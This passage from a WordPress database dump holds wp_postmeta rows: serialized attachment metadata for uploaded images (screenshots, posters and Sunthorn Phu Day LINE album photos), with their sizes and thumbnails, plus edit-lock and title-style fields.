(4899,1760,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1845;s:6:\"height\";i:462;s:4:\"file\";s:40:\"2025/07/Screenshot-2025-07-08-113208.png\";s:8:\"filesize\";i:228668;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"Screenshot-2025-07-08-113208-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18617;}s:5:\"large\";a:5:{s:4:\"file\";s:41:\"Screenshot-2025-07-08-113208-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:104056;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2025-07-08-113208-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14735;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:40:\"Screenshot-2025-07-08-113208-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:69685;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:41:\"Screenshot-2025-07-08-113208-1536x385.png\";s:5:\"width\";i:1536;s:6:\"height\";i:385;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:222538;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2025-07-08-113208-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31562;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4900,1761,'title_style','hidden'),
(4901,1761,'_title_style','field_5d1a0217cf408'),
(4902,1762,'title_style','hidden'),
(4903,1762,'_title_style','field_5d1a0217cf408'),
(4904,1764,'title_style','hidden'),
(4905,1764,'_title_style','field_5d1a0217cf408'),
(4906,1765,'_edit_lock','1751959331:1'),
(4907,1766,'_wp_attached_file','2025/07/11-68.png'),
(4908,1766,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2025/07/11-68.png\";s:8:\"filesize\";i:2314535;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"11-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:80672;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"11-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:652951;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"11-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:33246;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"11-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:718263;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"11-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1265183;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"11-68-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:104752;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4910,1765,'_thumbnail_id','1766'),
(4911,1765,'_edit_last','1'),
(4912,1765,'title_style','default'),
(4913,1765,'_title_style','field_5d1a0217cf408'),
(4914,1765,'related',''),
(4915,1765,'_related','field_603b51c3e183e'),
(4916,1767,'title_style','default'),
(4917,1767,'_title_style','field_5d1a0217cf408'),
(4918,1767,'related',''),
(4919,1767,'_related','field_603b51c3e183e'),
(4920,1768,'_edit_lock','1751960046:1'),
(4921,1769,'_wp_attached_file','2025/07/320170_0.jpg'),
(4922,1769,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1380;s:6:\"height\";i:1187;s:4:\"file\";s:20:\"2025/07/320170_0.jpg\";s:8:\"filesize\";i:170344;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"320170_0-300x258.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20299;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"320170_0-1024x881.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:881;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:138379;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"320170_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7781;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"320170_0-768x661.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:661;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89256;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"320170_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17006;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4923,1770,'_wp_attached_file','2025/07/320173_0.jpg'),
(4924,1770,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1239;s:6:\"height\";i:1322;s:4:\"file\";s:20:\"2025/07/320173_0.jpg\";s:8:\"filesize\";i:151132;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"320173_0-281x300.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19594;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"320173_0-960x1024.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132262;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"320173_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6988;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"320173_0-768x819.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:819;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94833;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"320173_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14332;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4925,1771,'_wp_attached_file','2025/07/320174_0.jpg'),
(4926,1771,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1230;s:6:\"height\";i:1330;s:4:\"file\";s:20:\"2025/07/320174_0.jpg\";s:8:\"filesize\";i:156371;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"320174_0-277x300.jpg\";s:5:\"width\";i:277;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19684;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"320174_0-947x1024.jpg\";s:5:\"width\";i:947;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136200;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"320174_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7160;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"320174_0-768x830.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:830;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97960;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"320174_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14750;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4927,1772,'_wp_attached_file','2025/07/320172_0.jpg'),
(4928,1773,'_wp_attached_file','2025/07/320171_0.jpg'),
(4929,1772,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1254;s:6:\"height\";i:1305;s:4:\"file\";s:20:\"2025/07/320172_0.jpg\";s:8:\"filesize\";i:163010;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"320172_0-288x300.jpg\";s:5:\"width\";i:288;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22098;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"320172_0-984x1024.jpg\";s:5:\"width\";i:984;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145292;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"320172_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7702;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"320172_0-768x799.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:799;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101226;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"320172_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16677;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4930,1773,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1475;s:6:\"height\";i:1109;s:4:\"file\";s:20:\"2025/07/320171_0.jpg\";s:8:\"filesize\";i:218250;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"320171_0-300x226.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18341;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"320171_0-1024x770.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:770;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154016;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"320171_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6372;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"320171_0-768x577.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96267;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"320171_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16661;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4932,1768,'_thumbnail_id','1771'),
(4933,1768,'_edit_last','1'),
(4934,1768,'title_style','default'),
(4935,1768,'_title_style','field_5d1a0217cf408'),
(4936,1768,'related',''),
(4937,1768,'_related','field_603b51c3e183e'),
(4938,1774,'title_style','default'),
(4939,1774,'_title_style','field_5d1a0217cf408'),
(4940,1774,'related',''),
(4941,1774,'_related','field_603b51c3e183e'),
(4943,1776,'_edit_lock','1752029827:1'),
(4944,1777,'_wp_attached_file','2025/07/12-68.png'),
(4945,1777,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2025/07/12-68.png\";s:8:\"filesize\";i:2652437;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"12-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:101321;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"12-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:794850;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"12-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41894;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"12-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:882115;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"12-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1582876;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"12-68-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:116625;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4947,1776,'_thumbnail_id','1777'),
(4948,1776,'_edit_last','1'),
(4949,1776,'title_style','default'),
(4950,1776,'_title_style','field_5d1a0217cf408'),
(4951,1778,'title_style','default'),
(4952,1778,'_title_style','field_5d1a0217cf408'),
(4956,1776,'related',''),
(4957,1776,'_related','field_603b51c3e183e'),
(4958,1778,'related',''),
(4959,1778,'_related','field_603b51c3e183e'),
(4962,1782,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_17.jpg'),
(4963,1782,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_17.jpg\";s:8:\"filesize\";i:576722;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_17-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18418;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_17-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165099;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9395;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_17-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99515;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_17-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:323817;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_17-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24120;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4964,1783,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_13.jpg'),
(4965,1783,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_13.jpg\";s:8:\"filesize\";i:541570;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_13-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19259;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_13-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:162233;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9484;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_13-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99385;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_13-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:311600;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_13-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24889;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4966,1784,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_16.jpg'),
(4967,1784,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_16.jpg\";s:8:\"filesize\";i:574974;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_16-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17590;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_16-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:162295;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8735;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_16-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96554;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_16-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:320840;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_16-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22777;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4968,1785,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_12.jpg'),
(4969,1786,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_15.jpg'),
(4970,1785,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_12.jpg\";s:8:\"filesize\";i:523642;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_12-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18677;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_12-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155157;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9024;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_12-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95036;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_12-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:298200;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_12-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24102;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4971,1786,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_15.jpg\";s:8:\"filesize\";i:593846;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_15-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17419;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_15-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165188;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8652;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_15-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97765;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_15-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:328675;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_15-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"files